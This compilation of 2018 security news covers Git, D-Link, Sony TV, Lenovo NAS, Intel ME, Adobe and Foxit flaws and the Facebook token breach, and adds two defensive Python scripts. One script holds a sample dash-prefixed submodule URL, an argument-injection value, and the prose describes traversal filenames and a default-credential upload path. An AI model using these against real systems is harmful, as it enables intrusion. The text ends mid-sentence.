"There was a total of 49 CVEs addressed across the portfolio," commented Chris Goettl, director of product management and security for Ivanti. "As expected, the majority, 33 were fixed in Windows 10, Edge, and the associated Server versions. Also, please note that there was an update for Server 2019 which was made generally available last week. Microsoft continued the trend from last month where they introduced both a monthly rollup and a security-only release for Server 2008. Prior to that there was only a single security update. Updates were released for all supported versions of Exchange Server and Sharepoint Server this month as well."


No Security Fixes in Patch Tuesday Updates for Flash Player
10.10.2018 securityweek
Vulnerebility

The Patch Tuesday updates released this month by Adobe for Flash Player include no security fixes. The company did address several vulnerabilities in some of its other products.

Adobe informed customers that Digital Editions for Windows, Mac and iOS is impacted by nine vulnerabilities, including four critical memory-related bugs that can be exploited for arbitrary code execution. The remaining flaws have been rated "important" and they can result in information disclosure.

All the Digital Editions flaws were reported to Adobe by Jaanus Kääp of Clarified Security.

Kushal Arvind Shah of Fortinet’s Fortiguard Labs informed Adobe of DLL hijacking vulnerabilities that allow privilege escalation in the Technical Communications Suite and the Framemaker application. Both security holes have been rated "important."

In Experience Manager, Adobe patched several stored and reflected cross-site scripting (XSS) vulnerabilities that can result in the disclosure of sensitive information.

While no security fixes have been rolled out on Tuesday for Flash Player, that does not mean the application is 100% secure. In October 2017, Adobe released no Patch Tuesday updates, but one week later it issued an emergency fix for Flash Player to resolve a zero-day vulnerability that had been exploited in targeted attacks by a Middle Eastern threat actor.

The number of vulnerabilities found by researchers in Flash Player has decreased significantly after Adobe announced its intention to kill the application by 2020, but malicious actors are still looking for flaws they can exploit in their operations. A zero-day was exploited by hackers as recently as June.


WECON PI Studio HMI software affected by code execution flaws
9.10.2018 securityaffairs
ICS  Vulnerebility

Security experts discovered several vulnerabilities in WECON’s PI Studio HMI software; the company has verified the issues but has not yet released patches.
Researchers Mat Powell and Natnael Samson discovered several vulnerabilities in WECON’s PI Studio HMI software, software widely used in the critical manufacturing, energy, metallurgy, chemical, and water and wastewater sectors.

Both experts reported the flaws through Trend Micro’s Zero Day Initiative.

WECON specializes in human-machine interfaces (HMIs), programmable logic controllers (PLCs), and industrial PCs. The company’s products are used all around the world, particularly in the critical manufacturing, energy, and water and wastewater sectors.

The list of flaws discovered by the experts includes a critical stack-based buffer overflow vulnerability, tracked as CVE-2018-14818, that could lead to remote code execution.

Another flaw, tracked as CVE-2018-14810, is a high severity out-of-bounds write bug which may allow code to be executed in the context of an administrator.

The remaining issues are two medium severity information disclosure flaws tracked as CVE-2018-17889 and CVE-2018-14814.

“Successful exploitation of these vulnerabilities may allow remote code execution, execution of code in the context of an administrator, read past the end of an allocated object or allow an attacker to disclose sensitive information under the context of administrator.” reads the security advisory published by the ICS-CERT.

WECON has confirmed the vulnerabilities, but it has not revealed when it will release security patches.


Below is the list of mitigations provided by ICS-CERT:

“WECON has verified the vulnerabilities but has not yet released an updated version.” continues the security advisory.

“NCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:

Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.”


The Git Project addresses a critical arbitrary code execution vulnerability in Git
8.10.2018 securityaffairs
Vulnerebility

The Git Project released new versions of the Git client, GitHub Desktop, and Atom that address a critical remote code execution vulnerability in Git.
The Git Project addressed a critical remote code execution vulnerability in the Git command line client, GitHub Desktop, and Atom.

The flaw tracked as CVE-2018-17456 could be exploited by malicious repositories to remotely execute commands on a vulnerable system.

A malicious repository can include a .gitmodules file that contains a URL that starts with a dash.

When Git clones such a repository with the --recurse-submodules argument, the dash causes the command to interpret the URL as an option, making it possible for an attacker to achieve remote code execution on the computer.

“When running “git clone --recurse-submodules”, Git parses the supplied .gitmodules file for a URL field and blindly passes it as an argument to a “git clone” subprocess. If the URL field is set to a string that begins with a dash, this “git clone” subprocess interprets the URL as an option. This can lead to executing an arbitrary script shipped in the superproject as the user who ran “git clone”.”

“In addition to fixing the security issue for the user running “clone”, the 2.17.2, 2.18.1 and 2.19.1 releases have an “fsck” check which can be used to detect such malicious repository content when fetching or accepting a push. See “transfer.fsckObjects” in git-config(1).”

This flaw has been addressed in Git v2.19.1, GitHub Desktop 1.4.2, GitHub Desktop 1.4.3-beta0, Atom 1.31.2, and Atom 1.32.0-beta3.

Users have to upgrade their installs to the latest version of the Git client, GitHub Desktop, or Atom.
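As an added example (not code from the Git project or the article), the following script scans a .gitmodules file for the pattern described above, a submodule URL that begins with a dash, so a repository can be checked before it is cloned with --recurse-submodules; the sample .gitmodules content is constructed.

```python
"""Scan a .gitmodules file for submodule URLs that begin with a dash.

Added example, not code from the Git project. A URL such as "-foo" is handed
to the "git clone" subprocess as if it were a command-line option, which is
the CVE-2018-17456 pattern described above. The parser below handles the
INI-like .gitmodules syntax by hand so it runs without git installed.
"""
import re
import sys

SECTION_RE = re.compile(r'^\[submodule\s+"(?P<name>[^"]*)"\]$')
OPTION_RE = re.compile(r'^(?P<key>[A-Za-z][A-Za-z0-9-]*)\s*=\s*(?P<value>.*)$')

# Constructed sample: one ordinary submodule and one whose URL starts with a dash.
SAMPLE_GITMODULES = """\
[submodule "vendor/libfoo"]
\tpath = vendor/libfoo
\turl = https://example.com/libfoo.git
[submodule "suspicious"]
\tpath = suspicious
\turl = -bogus-option
"""


def parse_gitmodules(text: str) -> dict:
    """Return {submodule name: {key: value}} for every [submodule "..."] block."""
    modules, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":      # blank line or comment
            continue
        section = SECTION_RE.match(line)
        if section:
            current = modules.setdefault(section.group("name"), {})
            continue
        option = OPTION_RE.match(line)
        if option and current is not None:
            value = option.group("value").strip()
            # git config allows double-quoted values; strip the quotes like git does
            if len(value) >= 2 and value[0] == value[-1] == '"':
                value = value[1:-1]
            current[option.group("key").lower()] = value
    return modules


def find_dash_urls(text: str) -> list:
    """Return (name, url) pairs where the url would be parsed as an option."""
    findings = []
    for name, opts in parse_gitmodules(text).items():
        url = opts.get("url", "")
        # "git clone <url>" treats a leading '-' as the start of a flag, not a location.
        if url.startswith("-"):
            findings.append((name, url))
    return findings


if __name__ == "__main__":
    # Usage: python scan_gitmodules.py [path/to/.gitmodules]; defaults to the sample.
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_GITMODULES
    hits = find_dash_urls(text)
    for name, url in hits:
        print(f"WARNING: submodule {name!r} has a dash-prefixed URL: {url!r}")
    if not hits:
        print("no dash-prefixed submodule URLs found")
    # Patched Git rejects such URLs itself; enabling fsck on transfer catches them on fetch/push:
    #   git config --global transfer.fsckObjects true
    sys.exit(1 if hits else 0)
```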


D-Link fixed several flaws in Central WiFiManager access point management tool
8.10.2018 securityaffairs
Vulnerebility

D-Link addresses several remote code execution and XSS vulnerabilities affecting the Central WiFiManager access point management tool.
D-Link issued security patches to address several remote code execution and cross-site scripting (XSS) vulnerabilities affecting the Central WiFiManager access point management tool.

The vulnerabilities have been reported by researchers at SecureAuth/CoreSecurity.

D-Link Central WiFiManager software controller helps network administrators streamline their wireless access point (AP) management workflow. It leverages a centralized server to remotely allow the management and the monitoring of wireless APs on a network.

The software can be deployed both locally and in the cloud.

The researchers discovered four potentially serious flaws in Central WiFiManager for Windows (version 1.03 and others) that can be exploited for arbitrary code execution.

The most severe flaw, tracked as CVE-2018-17440, is related to the presence of default credentials (admin/admin) in the FTP server running on port 9000 of the web app.

An attacker can use these credentials to connect to the server and upload a specially crafted PHP file that, once requested, will lead to arbitrary code execution.

“The web application starts an FTP server running on the port 9000 by default with admin/admin credentials and do not show the option to change it, so in this POC we establish a connection with the server and upload a PHP file. Since the application do not restrict unauthenticated users to request any file in the web root, we later request the uploaded file to achieve remote code execution.” reads the security advisory.


Another flaw discovered by the researchers, tracked as CVE-2018-17442, is an authenticated remote code execution issue caused by the unrestricted upload of a file with a dangerous type.

The Central WiFiManager access point management tool allows users to upload RAR archives and an authenticated attacker could exploit this feature by uploading an archive that includes a PHP file whose content will be executed in the context of the web application.

“When the .rar is uploaded is stored in the path ‘\web\captivalportal’ in a folder with a timestamp created by the PHP time() function. In order to know what is the web server’s time we request an information file that contains the time we are looking for. After we have the server’s time we upload the .rar, calculate the proper epoch and request the appropriate path increasing this epoch by one until we hit the correct one,” continues the advisory.

The remaining issues include two stored XSS flaws in the “UpdateSite” (CVE-2018-17443) and “addUser” (CVE-2018-17441) functionality, specifically in the sitename and username parameters, respectively.

The vulnerabilities were reported to D-Link on June 4, and the company addressed them with version 1.03R0100-Beta1.


Sony Bravia Smart TVs affected by a critical vulnerability
7.10.2018 securityaffairs
Vulnerebility

Experts at FortiGuard Labs team discovered three vulnerabilities in eight Sony Bravia smart TVs, one of them rated as critical.
Patch management is a crucial aspect of IoT security: smart objects surround us and represent a privileged target for hackers.

Experts at FortiGuard Labs team discovered three vulnerabilities (a stack buffer overflow, a directory traversal, and a command-injection issue) in eight Sony Bravia smart TVs, one of them rated as critical.

Affected Sony Bravia models include R5C, WD75, WD65, XE70, XF70, WE75, WE6 and WF6.

The most severe vulnerability, tracked as CVE-2018-16593, is a command-injection flaw that resides in Sony’s Photo Sharing Plus application, which allows users to share multimedia content from their mobile devices via Sony Smart TVs.

An attacker needs to be on the same wireless network as the Sony TV in order to trigger the vulnerability.

“This application handles file names incorrectly when the user uploads a media file. An attacker can abuse such filename mishandling to run arbitrary commands on the system, which can result in complete remote code execution with root privilege.” reads the blog post published by Fortinet.
“Fortinet previously released IPS signature Sony.SmartTV.Remote.Code.Execution for this specific vulnerability to proactively protect our customers.”


The remaining bugs also affect Sony’s Photo Sharing Plus application running on Sony Bravia TVs. The stack buffer overflow (CVE-2018-16595) is a memory corruption vulnerability tied to the lack of sanitization of user input.

“This is a memory corruption vulnerability that results from insufficient size checking of user input. With a long enough HTTP POST request sent to the corresponding URL, the application will crash.” continues the advisory.
“Fortinet previously released IPS signature Sony.SmartTV.Stack.Buffer.Overflow for this specific vulnerability to proactively protect our customers.”

The third flaw is a directory-traversal vulnerability, tracked as CVE-2018-16594, that relates to the way the Photo Sharing Plus app handles file names.

“The application handles file names incorrectly when receiving a user’s input file via uploading a URL. An attacker can upload an arbitrary file with a crafted file name (e.g.: ../../) that can then traverse the whole filesystem.” reads the blog post.
“Fortinet previously released IPS signature Sony.SmartTV.Directory.Traversal for this specific vulnerability to proactively protect our customers.”

Sony has provided over-the-air updates to address the flaws; the fixes need to be approved by the user.

“If your television is set to automatically receive updates when connected to the internet, it should have already been updated. This is the default setting for the affected models.” reads the security advisory published by Sony.

“To verify that your television has been updated, please visit the Downloads section of your model’s product page. Click the Firmware update link for details about how to check the software version. If your television has not already been updated, please follow the instructions to download and install the update.”


D-Link Patches Code Execution, XSS Flaws in Management Tool
7.10.2018 securityweek
Vulnerebility

D-Link has released patches for several remote code execution and cross-site scripting (XSS) vulnerabilities found by researchers in the company's Central WiFiManager access point management tool.

Central WiFiManager allows organizations to create and manage multi-site and multi-tenancy wireless networks. The software can be deployed both locally and in the cloud.

Researchers at SecureAuth + CoreSecurity discovered that version 1.03 – and possibly others – of Central WiFiManager for Windows is affected by four potentially serious vulnerabilities that can be exploited for arbitrary code execution.

The most severe of the security holes, CVE-2018-17440, is related to the fact that the web app includes an FTP server running on port 9000 with the default credentials admin/admin. An attacker can use it to establish a connection to the server and upload a specially crafted PHP file. Requesting this file can lead to arbitrary code execution.

Another code execution vulnerability discovered by researchers is CVE-2018-17442, which also involves uploading arbitrary files. The tool allows users to upload RAR archives and experts noticed that they can abuse the functionality to upload archives that include a PHP file whose content will be executed in the context of the web application. However, SecureAuth + CoreSecurity noted in its advisory that authentication is required for exploitation.

"When the .rar is uploaded is stored in the path '\web\captivalportal' in a folder with a timestamp created by the PHP time() function. In order to know what is the web server's time we request an information file that contains the time we are looking for. After we have the server's time we upload the .rar, calculate the proper epoch and request the appropriate path increasing this epoch by one until we hit the correct one," the security firm said in its advisory.

Experts also discovered two stored XSS flaws in the "UpdateSite" (CVE-2018-17443) and "addUser" (CVE-2018-17441) functionality, specifically the sitename and username parameters, respectively.

The vulnerabilities were reported to D-Link in early June and they were patched recently with the release of version 1.03R0100-Beta1.

"This disclosure directly affects the software package and current installations should be updated with the new release available to download below. Failure to update may put this software package, the host computer it runs on, and D-Link devices that it manages at risk," D-Link said in its own advisory.


CVE-2018-4251 – Apple did not disable Intel Manufacturing Mode in its laptops
5.10.2018 securityweek
Vulnerebility

Positive Technologies while analyzing Intel Management Engine (ME) discovered that Apple did not disable Intel Manufacturing Mode in its laptops
Experts from security firm Positive Technologies, while analyzing the Intel Management Engine (ME), discovered that Apple did not lock it down in its laptops.

The Intel Management Engine consists of a microcontroller that works with the Platform Controller Hub chip in conjunction with integrated peripherals; it is a critical component that handles data exchanged between the processor and peripherals.

For this reason, security experts warned in the past of the risks posed by Intel Management Engine vulnerabilities. An attacker can exploit a flaw in the Intel ME to establish a backdoor on the affected system and gain full control over it.

Last year the same group of experts at Positive Technologies discovered an undocumented configuration setting that disabled the Intel Management Engine.

The team also published a proof-of-concept exploit code for a vulnerability in the Intel Management Engine JTAG.

Last year, experts from the Electronic Frontier Foundation asked Intel to provide a way to disable the IME.

In August 2017, the experts from Positive Technologies (Dmitry Sklyarov, Mark Ermolov, and Maxim Goryachy) discovered a way to disable the Intel Management Engine 11 via an undocumented mode.

The researchers discovered that it is possible to turn off the Intel ME by setting the undocumented high assurance platform (HAP) bit to 1 in a configuration file.

The experts discovered that the security framework was developed by the US National Security Agency … yes the NSA!

This week, researchers Maxim Goryachy and Mark Ermolov published a blog post that revealed Chipzilla’s ME contains an undocumented Manufacturing Mode.

“Intel ME Manufacturing Mode is intended for configuration and testing of the end platform during manufacturing, and as such should be disabled (closed) before sale and shipment to users,” states the security duo.

“However, this mode and its potential risks are not described anywhere in Intel’s public documentation.”

The only way to access Intel Manufacturing Mode is a utility included in the Intel ME System Tools software, which isn’t available to the public. The software allows configuring platform settings in one-time programmable memory called Field Programming Fuses (FPF), an operation that is usually performed before shipment, and in the ME’s internal MFS (Minux File System) on SPI (Serial Peripheral Interface) flash memory, via parameters known as CVARs (Configurable NVARs, Named Variables).

On older systems, prior to Apollo Lake, Intel maintained separate access rights for the Intel Management Engine, Gigabit Ethernet, and CPU.

In newer systems, the SPI controllers implement the Master Grant feature that could override the access rights declared in the SPI descriptor.

“What this means is that even if the SPI descriptor forbids host access to an SPI region of ME, it is possible for ME to still provide access,” the researchers explain.

Experts pointed out that device makers cannot disable the Manufacturing Mode, opening the door to cyber attacks by a local attacker.

Ironically, one of Intel’s major customers, Apple, left Manufacturing Mode enabled; the issue is tracked as CVE-2018-4251.

Apple addressed the problem in June with the macOS High Sierra 10.13.5 update.

The security experts published Python code on GitHub to check whether Manufacturing Mode is enabled on Intel platforms.

“Our research shows that Intel ME has a Manufacturing Mode problem, and that even giant manufacturers such as Apple are not immune to configuration mistakes on Intel platforms. Worse still, there is no public information on the topic, leaving end users in the dark about weaknesses that could result in data theft, persistent irremovable rootkits, and even “bricking” of hardware.” conclude the experts.
“We also suspect that the ability to reset ME without resetting the main CPU may lead to yet additional security issues, due to the states of the BIOS/UEFI and ME falling out of sync.”
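As an added example (not the researchers' GitHub tool and not Intel code), the following Linux script reads the ME firmware status register HFSTS1 from the MEI/HECI device's PCI configuration space and decodes the Manufacturing Mode bit, the same kind of check the article refers to. The device location (00:16.0), the register offset (0x40) and the bit layout follow Intel's published HECI firmware status-register definitions and are stated here as assumptions; confirm them against your platform's documentation.

```python
"""Decode Intel ME HFSTS1 and report whether Manufacturing Mode is enabled.

Added example, not the Positive Technologies tool. Assumptions: the MEI/HECI
device sits at PCI 00:16.0 and HFSTS1 is the 32-bit little-endian register at
config-space offset 0x40, with bit 4 = Manufacturing Mode (layout taken from
Intel's HECI firmware status definitions). Reading PCI config space beyond the
first 64 bytes through sysfs requires root.
"""
import sys

MEI_CONFIG_PATH = "/sys/bus/pci/devices/0000:00:16.0/config"  # assumed MEI location
HFSTS1_OFFSET = 0x40                                         # assumed register offset

# Working-state codes of the ME firmware (field in bits 0-3), as assumed here.
WORKING_STATES = {0: "reset", 1: "init", 2: "recovery", 5: "normal",
                  6: "disable wait", 7: "transition", 8: "invalid"}


def decode_hfsts1(value: int) -> dict:
    """Split HFSTS1 into the fields relevant to a manufacturing-mode check."""
    return {
        "working_state": value & 0xF,                   # bits 0-3
        "manufacturing_mode": bool(value & (1 << 4)),   # bit 4: platform not closed
        "fpt_bad": bool(value & (1 << 5)),              # bit 5: flash partition table bad
        "operation_state": (value >> 6) & 0x7,          # bits 6-8
        "fw_init_complete": bool(value & (1 << 9)),     # bit 9
        "error_code": (value >> 12) & 0xF,              # bits 12-15
        "operation_mode": (value >> 16) & 0xF,          # bits 16-19
    }


def read_hfsts1(config_path: str = MEI_CONFIG_PATH) -> int:
    """Read HFSTS1 from the MEI device's PCI config space (needs root on Linux)."""
    with open(config_path, "rb") as f:
        f.seek(HFSTS1_OFFSET)
        raw = f.read(4)
    if len(raw) != 4:
        raise OSError("short read of PCI config space; run as root and check the device path")
    return int.from_bytes(raw, "little")


def manufacturing_mode_report(value: int) -> str:
    """Human-readable verdict for one HFSTS1 value."""
    fields = decode_hfsts1(value)
    verdict = ("ENABLED (platform was not closed before shipment)"
               if fields["manufacturing_mode"] else "disabled")
    state = WORKING_STATES.get(fields["working_state"], "unknown")
    return (f"HFSTS1=0x{value:08x}: manufacturing mode {verdict}; "
            f"working_state={state} operation_mode={fields['operation_mode']} "
            f"fw_init_complete={fields['fw_init_complete']} error_code={fields['error_code']}")


if __name__ == "__main__":
    # Optional argument: a hex HFSTS1 value to decode offline (for instance one captured
    # with 'setpci -s 00:16.0 40.L') instead of reading the live register.
    hfsts1 = int(sys.argv[1], 16) if len(sys.argv) > 1 else read_hfsts1()
    print(manufacturing_mode_report(hfsts1))
    sys.exit(1 if decode_hfsts1(hfsts1)["manufacturing_mode"] else 0)
```

A non-zero exit status flags an open platform, which makes the script usable from a fleet-inventory job that records the raw HFSTS1 value per machine.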


Foxit Reader Update Patches Over 100 Vulnerabilities
4.10.2018 securityweek
Vulnerebility

The newly released Foxit Reader 9.3 brings along patches for over 100 security flaws, including some that could result in remote code execution.

Developed by California-based Foxit Software, the Foxit Reader is a multilingual freemium tool that allows users to create, view, edit, digitally sign, and print Portable Document Format (PDF) files. According to the company, the reader has hundreds of millions of users.

The latest version of the reader, Foxit reveals in an advisory, brings patches for a broad range of vulnerabilities, including out-of-bounds, use-after-free, information disclosure, type confusion, and memory corruption bugs, the most severe of which could result in remote code execution.

The vulnerabilities, Foxit says, could be exploited when parsing strings, when executing certain JavaScript, due to the use of objects which have been deleted or closed, when handling certain properties of annotation objects, or when opening or processing malicious PDF documents.

18 of the vulnerabilities were disclosed by security researchers with Cisco Talos, all of which could be exploited for either remote or arbitrary code execution. The bugs impact the JavaScript engine of the Reader and can be exploited with the help of a specially crafted, malicious PDF either open in the application itself or in a browser, if the browser plugin is enabled.

Most of the remaining security vulnerabilities addressed with this update were discovered by security researchers working with Trend Micro's Zero Day Initiative.

The bugs are said to impact version 9.2.0.9297 and earlier of Foxit Reader and Foxit PhantomPDF and have been addressed with the release of Foxit Reader 9.3 and Foxit PhantomPDF 9.3.

The security updates arrived only days before Adobe released tens of patches for its own PDF tools. On Monday, the company announced the availability of Acrobat DC and Acrobat Reader DC (Continuous) 2019.008.20071, Acrobat 2017 and Reader DC 2017 (Classic 2017) 2017.011.30105, and Acrobat DC and Reader DC (Classic 2015) 2015.006.30456, which address a total of 86 vulnerabilities.


Experts found 9 NAS flaws that expose LenovoEMC, Iomega Devices to hack
3.10.2018 securityaffairs
Vulnerebility

Experts discovered nine vulnerabilities affecting Lenovo NAS devices that could be exploited by unauthenticated attackers to access protected content.

The vulnerabilities are tracked as CVE-2018-9074, CVE-2018-9075, CVE-2018-9076, CVE-2018-9077, CVE-2018-9078, CVE-2018-9079, CVE-2018-9080, CVE-2018-9081 and CVE-2018-9082.

According to Lenovo, the flaws affect 20 models of network attached storage (NAS) devices sold by the company, including Lenovo-branded NAS devices, LenovoEMC, and Iomega.

The list of vulnerable devices includes eight LenovoEMC NAS (PX) models, nine Iomega StoreCenter (PX and IX) models and the Lenovo-branded ix4-300d, ix2 and EZ Media and Backup Center.

The flaws have been discovered as a part of a research project conducted by ISE Labs focused on the security of embedded devices.

[Image: Lenovo NAS]

Most of the devices audited by the researchers were affected by some form of OS command injection vulnerability that a remote attacker could exploit to obtain a root shell on the targeted device.

By chaining different vulnerabilities it is possible to gain full access to the device. The experts noticed, for example, that obtaining the user’s access token and a session-cookie-like identifier (the “__c” parameter) is enough to reach that goal. A typical attack scenario for obtaining these values involves luring an authenticated NAS user into visiting a specially crafted malicious website.

“If we want to exploit this OS command injection we are going to need to figure out how these tokens are generated or access to the victim’s iomegaUserCookie (__c) token. Whenever I think about stealing some type of value stored in the user’s browser I think about cross-site scripting (XSS).” states the researchers.

The experts found a cross-site scripting vulnerability that allowed them to access the information, then used stored browser data to execute commands on the vulnerable devices.

Once a target’s NAS access token and “__c” parameter are obtained, the attacker only needs the device’s static IP address to reach it, which is trivial to find.

In summary, by chaining the command injection vulnerability with the privilege escalation issues, an attacker can execute commands on the devices on behalf of legitimate users.

The experts reported the vulnerabilities to Lenovo on August 3 and the company issued patches for vulnerable systems on Sept. 20 and publicly disclosed the vulnerabilities on September 30.

Lenovo confirmed that firmware versions 4.1.402.34662 and earlier are vulnerable; users should update to firmware version 4.1.404.34716 or later.

The company suggests removing any public shares and using the device only on trusted networks in case it is not possible to immediately update the firmware.


Foxit Reader 9.3 addresses 118 Vulnerabilities, 18 of them rated as critical
3.10.2018 securityaffairs
Vulnerebility

Foxit Software released a security update for its Foxit Reader product that addresses over 100 vulnerabilities, 18 of them rated as critical; some of them could be exploited by a remote attacker to execute arbitrary code.

Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files, it has hundreds of millions of installations.

Foxit has released Reader 9.3 and Foxit PhantomPDF 9.3 to address security and stability issues.

Foxit Reader 9.3 addressed a broad range of vulnerabilities, including out-of-bounds, use-after-free, information disclosure, type confusion, and memory corruption bugs.

The updates fix a total of 116 vulnerabilities, 18 of which are rated as “critical” and were discovered by researchers at the Cisco Talos group.

The critical flaws affect the JavaScript engine of Foxit Reader; an attacker could trigger them with a specially crafted web page or PDF document.

The updates were issued a couple of days before Adobe released security patches for 86 flaws in the Mac and Windows versions of Adobe Acrobat and Adobe Reader, 46 of them rated as critical.


Adobe Patches 86 Vulnerabilities in Acrobat Products
2.10.2018 securityweek
Vulnerebility

Adobe on Monday released updates for the Windows and macOS versions of its Acrobat products to address tens of vulnerabilities, including critical issues that allow arbitrary code execution.

Acrobat DC and Acrobat Reader DC (Continuous) 2019.008.20071, Acrobat 2017 and Reader DC 2017 (Classic 2017) 2017.011.30105, and Acrobat DC and Reader DC (Classic 2015) 2015.006.30456 patch a total of 86 flaws.

The list includes 22 out-of-bounds write issues, 7 heap overflows, 7 use-after-free bugs, 3 type confusion issues, one double-free bug, 3 buffer errors, and 3 untrusted pointer dereference bugs – all of these are critical and can be exploited for code execution.

One security bypass issue that can lead to privilege escalation has also been classified as “critical.” The remaining flaws are stack overflow, integer overflow, and out-of-bounds read issues that have been described as “important” and which can lead to information disclosure.

Independent researchers and employees of Qihoo 360, Cisco Talos, Beihang University, Palo Alto Networks, Knownsec, Check Point Software Technologies, and Tencent were credited for reporting these vulnerabilities. Many of the security holes were reported to Adobe through Trend Micro’s Zero Day Initiative (ZDI).

However, the researcher credited for the highest number of bugs is Omri Herscovici, vulnerability research team leader at Check Point. He reported 35 of the flaws patched by Adobe on Monday.

While many of the vulnerabilities have been classified as “critical,” Adobe has assigned the security updates a priority rating of “2,” which indicates that there are no known exploits and the company does not believe exploits are imminent.

Last month, Adobe only patched 7 vulnerabilities in its Acrobat products. However, it’s not uncommon for the company to resolve a large number of security weaknesses in these applications – back in July it fixed over 100.

*Updated the number of patched vulnerabilities from 85 to 86 after obtaining clarifications from Adobe


Adobe security updates for Acrobat fix 86 Vulnerabilities, 46 rated as critical
2.10.2018 securityaffairs
Vulnerebility

Adobe has released security updates to address 86 vulnerabilities affecting the Mac and Windows versions of Adobe Acrobat and Adobe Reader. The security updates fix 47 vulnerabilities classified as ‘critical’ and 39 flaws classified as ‘important’.

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and MacOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

46 of the critical vulnerabilities could be exploited by attackers to execute arbitrary code on vulnerable systems; the remaining one is a privilege escalation bug. All 39 flaws classified as ‘important’ are information disclosure issues.

Users can update their installations manually by choosing Help > Check for Updates; the full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.

Adobe Acrobat and Adobe Reader users should install the latest versions as soon as possible (Acrobat DC and Acrobat Reader DC version 2019.008.20071, Acrobat 2017 and Acrobat Reader DC version 2017.011.30105, Acrobat DC 2015 and Acrobat Reader DC 2015 versions 2015.006.30456).

The security advisory includes the full list of patched vulnerabilities and organizations or experts that reported them.


Several Bugs Exploited in Massive Facebook Hack
1.10.2018 securityaffairs
Social  Vulnerebility

Facebook Shares More Details on Hack Affecting 50 Million Accounts

Facebook has shared additional details about the hacker attack affecting 50 million accounts, including technical information and what its investigation has uncovered so far.

The social media giant announced on Friday that malicious actors exploited a vulnerability related to the “View As” feature to steal access tokens that could have been leveraged to hijack accounts. The tokens of nearly 50 million users have been compromised.

The tokens of these users have been reset to prevent abuse, along with the tokens of 40 million others who may be at risk due to the fact that they were subject to a View As lookup in the past year – impacted users will need to log back in to their accounts. The problematic feature has been suspended until a security review is conducted.

Technical details on Facebook hack

The “View As” feature shows users how others see their profile. This is a privacy feature designed to help users ensure that they only share information and content with the intended audience.

The vulnerability that exposed access tokens involved a combination of three distinct bugs affecting the “View As” feature and a version of Facebook’s video uploader interface introduced in July 2017.

When “View As” is used, the profile should be displayed as a read-only interface. However, the text box that allows people to wish happy birthday to their friends erroneously allowed users to post a video – this was the first bug.

When posting a video in the affected box, the video uploader generated an access token that had the permissions of the Facebook mobile app – this was the second bug as the video uploader should not have generated a token at this point.

The third and final problem was that the generated token was not for the user who had been using “View As” but for the individual whose profile was being looked up.

Hackers could obtain the token from the page’s HTML code and use it to access the targeted user’s account. An attacker would first have to target one of their friends’ accounts and move from there to other accounts. The attack did not require any user interaction.

“The attackers were then able to pivot from that access token to other accounts, performing the same actions and obtaining further access tokens,” explained Pedro Canahuati, VP of Engineering, Security and Privacy at Facebook.

Users and information affected by the breach

Facebook says the vulnerability has been patched. The social media giant claims that while the attackers did try to query its APIs to access profile information – such as name, gender and hometown – there is no evidence that any private information was actually accessed.

Facebook’s investigation continues, but the company says it has found no evidence that the attackers accessed private messages or credit card information.

Facebook says impacted users are from all around the world – it does not appear that the attack was aimed at a specific country or region. It’s worth noting that Facebook founder and CEO, Mark Zuckerberg, and Sheryl Sandberg, the company’s COO, were among those affected.

Another noteworthy issue is that the exposed tokens can be used not only to access Facebook accounts, but also third-party apps that use Facebook login. However, the risk should be eliminated now that the existing tokens have been reset.

Users who have linked Facebook to an Instagram account will need to unlink and relink their accounts due to the tokens being reset. Facebook clarified that WhatsApp is not impacted.

Facebook is alerting users whose tokens have been compromised by sending notifications to their accounts. In some cases, users can check if their accounts were actually hacked by accessing the “Security and Login” page from the Settings menu. However, access is only logged if the attacker created a full web session.

Incident timeline and information on attackers

Facebook discovered the breach following an investigation that started on September 16, after noticing a traffic spike, specifically increased user access to the website. However, it only realized that it was dealing with an attack on September 25, when it also identified the vulnerability. Affected users were notified and had their access tokens reset beginning with Thursday, September 27.

As for the attackers, no information has been shared, but the social media firm did note that exploitation of the vulnerability is complex and it did require a certain skill level.

The company says it has notified the FBI and law enforcement. While the company has responded quickly after the breach was discovered, MarketWatch reports that the Data Protection Commission in Ireland, Facebook's main privacy regulator in Europe, could fine the company as much as $1.64 billion under the recently introduced GDPR.

U.S. Senator Mark R. Warner responded to news of the Facebook hack, asking for a full investigation.

“Today’s disclosure is a reminder about the dangers posed when a small number of companies like Facebook or the credit bureau Equifax are able to accumulate so much personal data about individual Americans without adequate security measures,” Sen. Warner said. “This is another sobering indicator that Congress needs to step up and take action to protect the privacy and security of social media users. As I’ve said before – the era of the Wild West in social media is over.”

FTC Commissioner Rohit Chopra wrote on Twitter that he wants answers.

Despite no evidence of harm to any user, a class action lawsuit has already been filed against Facebook in the United States.

Facebook stock fell 3 percent after the breach was disclosed.


Telegram CVE-2018-17780 flaw causes the leak of IP addresses when initiating calls
1.10.2018 securityaffairs
Vulnerebility

CVE-2018-17780 – Security researcher Dhiraj Mishra discovered that Telegram’s default configuration exposes a user’s IP address when making a call.
Strangely, tdesktop 1.3.14 and Telegram for Windows Phone (3.3.0.0, WP8.1) leak the end user’s private and public IP addresses while making calls.

Dhiraj (@mishradhiraj_) tweeted on Sep 29, 2018: “.@telegram unsafe default behavior of P2P leaks IP address, and CVE-2018-17780 is assigned to this. https://www.inputzero.io/2018/09/bug-bounty-telegram-cve-2018-17780.html #infosec #bugbounty”

Telegram is supposedly a secure messaging application, yet its clients use a peer-to-peer (P2P) connection by default when initiating a call. This setting can be changed under “Settings > Privacy and security > Calls > peer-to-peer” to the other available options.

tdesktop and Telegram for Windows Phone break this trust by leaking the end user’s public and private IP addresses, and at the time there was no option in those clients to set “P2P > Nobody”.

Note: Telegram for Android will also leak your IP address unless you have set “Settings > Privacy and security > Calls > peer-to-peer > Nobody” (the difference is that the Android client already offers the peer-to-peer setting for calls).

To view this in action in tdesktop:

